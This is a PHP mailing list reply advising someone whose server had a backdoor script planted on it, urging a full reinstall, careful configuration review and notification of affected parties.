Assuming you are not just trolling, > Fortunatly I don't think they were doing something correctly, cause it > didn't deface my site like some of the others....
Don't count on it. They only deface servers they don't want to use. > ... > everyone can execute shell commands via system(); on your server. > -> delete the script ;) Oh, by all means, delete it if you want. But it's not the hole it came in through, and it's not the real backdoor. It's so blatent, I'd guess it's a script kiddy or a decoy. Even if it's a script kiddy, you _want_ to know how it got on the box. I'd take the box offline, back up all the data and configuration files, and re-install the whole system and all programs from scratch. Go over every configuration file with a fine-tooth comb. If the machine is on a subnet and I controlled the subnet, I think I'd take the whole subnet down, including the firewall, and clean every machine up, not putting any machine back on the subnet until it was clean and any holes patched. If I didn't control the subnet, I'd make sure the persons who did know there had been a break-in. And if you have any valuable data, consider it to have been stolen. If you have credit card numbers, report the possibility of theft to the credit card companies. Etc. If you're trolling, go away. -- Joel Rees, programmer, Systems Group Altech Corporation (Alpsgiken), Osaka, Japan http://www.alpsgiken.co.jp -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
